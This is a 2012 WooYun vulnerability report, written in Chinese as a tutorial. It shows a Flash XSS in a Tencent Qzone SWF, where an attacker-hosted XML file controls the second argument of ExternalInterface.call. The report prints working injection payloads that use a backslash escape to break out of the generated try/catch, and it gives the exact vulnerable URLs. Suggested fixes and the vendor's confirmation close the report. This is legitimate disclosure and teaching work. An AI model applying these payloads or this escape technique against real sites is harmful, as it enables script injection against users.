当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-016598

漏洞标题:[腾讯实例教程] 那些年我们一起学XSS - 16. Flash Xss进阶 [ExternalInterface.call第二个参数]

相关厂商:腾讯

漏洞作者: 心伤的瘦子

提交时间:2012-12-27 17:33

修复时间:2013-02-10 17:34

公开时间:2013-02-10 17:34

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-27: 细节已通知厂商并且等待厂商处理中
2012-12-28: 厂商已经确认,细节仅向厂商公开
2013-01-07: 细节向核心白帽子及相关领域专家公开
2013-01-17: 细节向普通白帽子公开
2013-01-27: 细节向实习白帽子公开
2013-02-10: 细节向公众公开

简要描述:

讲完ExternalInterface.call的第一个参数,我们接着来讲第“2”个参数,之所以2打上引号,因为 call 函数的原型是:call(functionName:String, ... arguments):*, 即后面可以有很多很多个参数,我们统称为第2个参数。有时候我们会遇到ExternalInterface.call("xxxxx","可控内容");的情况,那么这种情况下,如何构造XSS呢?

详细说明:

1. 有了上一节教程的基础,这次我们直接见实例。
通过GOOGLE搜索,site:qq.com filetype:swf inurl:xml
我们可以找到以下FLASH。
http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml
2. 借鉴上上节教程的思路,我们可以看看http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml里是个什么内容。

82.jpg


3. 好像看不出来是个啥用途,我们反编译FLASH文件。

83.jpg


4. 接着我们先看看是否有getURL, ExternalInterface.call之类的。

84.jpg


可以看到,我们搜索到的是下面这句:

flash.external.ExternalInterface.call("custom_menu_swf", menu_array[_local2].href);


那么call的第一个参数是被限定死了~,第2个参数为 menu_array[_local2].href,
如果你对AS有一点了解,不难看出menu_array是一个数组,那么_local2应该就是数组的下标,
而从单词含义“菜单数组”我们不难联想到上面xml文件里的数据。

85.jpg


5. 换句话说,这里我们的可以控制call的第2个参数。同教程14中的方法,我们下载下来http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml。 先做点修改,然后上传到自己网站上。
我们将代码里日志那一行的href改掉。

<menu name="日  志" href="\&quot;,alert(1)" />


上传修改后的文件,同时记得将crossdomain.xml上传至自己的网站根目录下哦~~(见教程14)
6. 接着我们载入我们自己指定的XML文件。
http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml
7. 接着我们打开Firefox浏览器。 有人会问,你怎么突然要用Firefox啊!疯了么!! 同志们,我没疯,只是因为FF可以捕获到这里的错误,而chrome捕获不到!
我们打开Firefox后, 访问上面的地址,点击【日志】按钮!!
Ctrl+shift+J 打开错误控制台!可以看到以下报错!

86.jpg


8. 记性好的朋友,会马上想起上一节里我们说到的。
ExternalInterface.call("函数名","参数1");
实际上执行的是以下内容,

try { __flash__toXML(函数名("参数1")) ; } catch (e) { "<undefined/>"; }


我们就是从FF这里捕获错误到这点的!(:) 当然也还会有其他方法)。
为什么会出错呢? 我们一起来看看。
9. 当我们点击 【日志】按钮时,会调用。
flash.external.ExternalInterface.call("custom_menu_swf", menu_array[_local2].href);
而menu_array[_local2].href 等于 \",alert(1), 进而,我们代入完整的代码,即如下:

try { __flash__toXML(custom_menu_swf("\\",alert(1)")) ; } catch (e) { "<undefined/>"; }


转换过程如下图:

87.jpg


可以看到转换之后,JS代码有点乱,引号到处飞,括号无处寻,因而报错了!
10. 那么我们怎么构造正确的利用代码呢?其实有上一节的知识并不难!

try { __flash__toXML(custom_menu_swf("构造点构造点")) ; } catch (e) { "<undefined/>"; }


首先第一步,要注入自己代码,首先要闭合掉双引号!

try { __flash__toXML(custom_menu_swf("构造点"),alert("构造点")) ; } catch (e) { "<undefined/>"; }


但是从上面转换流程,我们可以看到, " 会变成 \", 即变成了下面的样子,还是突破不出去。

try { __flash__toXML(custom_menu_swf("构造点\"),alert(\"构造点")) ; } catch (e) { "<undefined/>"; }


89.jpg


不过非常庆幸的事情是,这里没有对 \ 进行转义。 我们可以通过输入 \" 来构造。JS的字符串里,\ 用 \\ 表示。如下:

try { __flash__toXML(custom_menu_swf("构造点\\"))}catch(e){alert(1)}//构造点")) ; } catch (e) { "<undefined/>"; }


图片分析如下:

88.jpg


11. 罗嗦了这么多,我们把构造点代码,拿出来,插入到XML文件里。注意以下几点:
11.1 最后构造的代码是\\", 实际我们的输入是\",然后由FLASH自己转变为\\"的,因而利用代码里只需要输入\"即可。
11.2 由于在XML的节点属性里,双引号写为 &quot;
<menu name="日 志" href="构造点\&quot;))}catch(e){alert(1)}//构造点" />
12. 再次上传文件。打开

http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml


点击日志,看看效果。

90.jpg

漏洞证明:

将详细说明

修复方案:

1. 传入call第2个参数前,对\进行转义。
2. 禁止调用第三方的外部XML文件。

版权声明:转载请注明来源 心伤的瘦子@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-12-28 15:32

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无